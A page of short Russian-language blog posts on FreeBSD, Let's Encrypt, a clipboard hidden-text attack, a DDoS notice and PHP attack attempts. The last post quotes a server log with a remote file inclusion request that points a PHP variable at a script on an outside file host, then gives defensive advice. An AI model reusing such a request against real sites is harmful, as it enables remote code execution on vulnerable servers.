PythonDialogBug на FreeBSD в Letsencrypt

Многие наверняка слышали об инициативе по выдаче бесплатных сертификатов Let’s Encrypt (которую скоро переименуют и она будет жить на EFF). Выдаются они всего на 3 месяца, но обновление можно автоматизировать. Я тоже решил попробовать этого зверя, установил из портов и… обломался. Получил ошибку PythonDialogBug (полный лог см. ниже). Быстро найти решение не удалось, поэтому я забросил это дело на несколько месяцев. Когда снова “дошли руки”, начал гуглить информацию по питону. На одном форуме нашел предложение попробовать маленький скрипт:

Читать остальную часть заметки »

Теги: , , , , , , , , , , ,

WYSINWYC — What you see is not what you copy

В сети появилось несколько сообщений об интересной уязвимости: при копировании текста с веб-сайта можно скопировать скрытый текст, который может выполнить что угодно. При вставке текста вы его можете увидеть, но не сможете отменить его исполнение. Примечательно, что при выделении строки тройным кликом, строка со скрытым текстом не выделяется по-нормальному, выделяется только кусок строки. В общем, доверяй, да проверяй, самым надежным все же остается ручной ввод команд.


Теги: , , , , , ,

Добро побеждает зло

Вот так, други мои, делаешь людям добро, а получаешь DDoS-атаку на свою задницу:

Dear FreeDns.ws users!
Unfortunately, our servers has been affected by a DDoS attack.
We are working on resultion of this problem in cooperation with our providers.
Normal operation of our service will be restored in 24 hours.
Thank you for understanding,
FreeDns.ws Administration.


Теги: , , , , ,

Color Scheme Designer

ColorSchemeDesigner – очень удобный инструмет для дизайнеров, можно не только выбрать цветовую схему, но и просмотреть тестовую страничку с демонстрацией сочетания цветов.


Теги: , , , , , , ,

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP.

/var/log/messages:
Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’)

Пример запроса (из лога апача):
211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1» 302 — «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)»

Файл IDtest.txt все еще доступен для скачивания. Видимо никто еще на него не жаловался или хостинг игнорирует абузы.

Как защититься?

a) обновите PHP;
b) не включайте register_globals (оставьте Off);
c) дополнительно можете пользоваться патчем/модулем suhosin.


Теги: , , , , , , , , , , ,